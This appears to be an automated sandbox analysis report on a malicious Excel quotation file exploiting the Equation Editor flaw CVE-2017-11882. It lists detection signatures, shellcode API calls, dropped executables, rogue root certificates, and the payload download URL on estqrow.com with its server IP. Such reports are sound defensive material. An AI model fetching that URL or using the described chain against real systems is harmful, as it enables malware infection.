Windows Analysis Report
Quotation_398893.xlam.xlsx

Overview

General Information

Sample name:	Quotation_398893.xlam.xlsx
Analysis ID:	1530599
MD5:	8ab8d813d3ca68c8effdb8abbf4a4f86
SHA1:	f26fa096a70eec2a9900e363f63a1e6cafe5e8d4
SHA256:	11a5d3add86410357163004a54f22335583b895a390e7eaf567e423ac7ccfeff
Tags:	CVE-2017-11882xlamxlsxuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: File Dropped By EQNEDT32EXE

Document exploit detected (process start blacklist hit)

Installs new ROOT certificates

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Quotation_398893.xlam.xlsx

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe	Virustotal: Detection: 6%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for submitted file

Source: Quotation_398893.xlam.xlsx	ReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsx	Virustotal: Detection: 50%			Perma Link

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 154.38.177.76 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2

Source:

Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610775 WinExec,ExitProcess,	1_2_03610775
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW,	1_2_036106C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_0361072A URLDownloadToFileW,	1_2_0361072A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610649 URLDownloadToFileW,	1_2_03610649
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_036106DB URLDownloadToFileW,	1_2_036106DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610795 ExitProcess,	1_2_03610795
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610614 ExitProcess,	1_2_03610614

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Code function: 4x nop then dec eax

4_2_000007FE8B6F4201

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: estqrow.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: COGENT-174US COGENT-174US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 154.38.177.76:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /rt/vss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: estqrow.comConnection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW,

1_2_036106C1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe

Jump to behavior

Source: global traffic

Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: estqrow.com

Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.0000000000314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.468050895.00000000002C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exe
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exeC:
Source: EQNEDT32.EXE, 00000001.00000002.468050895.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exehhC:
Source: EQNEDT32.EXE, 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exej
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown

HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Quotation_398893.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: classification engine

Classification label: mal100.expl.winXLSX@4/4@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Quotation_398893.xlam.xlsx

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8A54.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Quotation_398893.xlam.xlsx	ReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsx	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: rpcrtremote.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Quotation_398893.xlam.xlsx

Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: Quotation_398893.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_0361006C push eax; ret	1_2_0361006D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610278 push edi; iretd	1_2_0361027C
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Code function: 4_2_000007FE8B6F00BD pushad ; iretd	4_2_000007FE8B6F00C1
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Code function: 4_2_000007FE8B6F00CD pushad ; iretd	4_2_000007FE8B6F00C1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe			Jump to dropped file

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
